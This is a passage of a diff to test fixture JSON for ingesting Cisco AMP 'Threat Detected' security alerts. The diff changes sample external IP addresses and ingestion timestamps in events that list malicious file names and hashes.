Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667841684537366\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2995,7 +2995,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3045,7 +3045,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3062,8 +3062,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174580181Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":80000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667841684537365\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:36.337250700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":80000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667841684537365\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3085,7 +3085,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3132,7 +3132,7 @@ "ec80314ae4a2817be806b7ae27dbdb31a88226a0" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3142,8 +3142,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174582214Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258118058508000,\"timestamp\":1610705633,\"timestamp_nanoseconds\":636000000,\"date\":\"2021-01-15T10:13:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258118058508361\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "ingested": "2021-12-09T13:35:36.337256700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258118058508000,\"timestamp\":1610705633,\"timestamp_nanoseconds\":636000000,\"date\":\"2021-01-15T10:13:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258118058508361\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3165,7 +3165,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3215,7 +3215,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3228,8 +3228,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174584201Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667837389570000,\"timestamp\":1610705633,\"timestamp_nanoseconds\":689000000,\"date\":\"2021-01-15T10:13:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667837389570068\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:36.337262700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667837389570000,\"timestamp\":1610705633,\"timestamp_nanoseconds\":689000000,\"date\":\"2021-01-15T10:13:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667837389570068\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3251,7 +3251,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3298,7 +3298,7 @@ "ec80314ae4a2817be806b7ae27dbdb31a88226a0" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3308,8 +3308,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174586257Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258066518901000,\"timestamp\":1610705621,\"timestamp_nanoseconds\":608000000,\"date\":\"2021-01-15T10:13:41+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258066518900808\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "ingested": "2021-12-09T13:35:36.337268600Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258066518901000,\"timestamp\":1610705621,\"timestamp_nanoseconds\":608000000,\"date\":\"2021-01-15T10:13:41+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258066518900808\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3331,7 +3331,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3378,7 +3378,7 @@ "ec80314ae4a2817be806b7ae27dbdb31a88226a0" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3388,8 +3388,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174588275Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258014979293000,\"timestamp\":1610705609,\"timestamp_nanoseconds\":581000000,\"date\":\"2021-01-15T10:13:29+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258014979293255\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "ingested": "2021-12-09T13:35:36.337274600Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258014979293000,\"timestamp\":1610705609,\"timestamp_nanoseconds\":581000000,\"date\":\"2021-01-15T10:13:29+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258014979293255\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3411,7 +3411,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3458,7 +3458,7 @@ "ec80314ae4a2817be806b7ae27dbdb31a88226a0" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3468,8 +3468,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174590339Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176257963439686000,\"timestamp\":1610705597,\"timestamp_nanoseconds\":569000000,\"date\":\"2021-01-15T10:13:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176257963439685702\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "ingested": "2021-12-09T13:35:36.337280500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176257963439686000,\"timestamp\":1610705597,\"timestamp_nanoseconds\":569000000,\"date\":\"2021-01-15T10:13:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176257963439685702\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3491,7 +3491,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3541,7 +3541,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3558,8 +3558,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174592404Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":778000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667579691532307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:36.337286500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":778000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667579691532307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3581,7 +3581,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3631,7 +3631,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3644,8 +3644,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174594469Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":747000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat 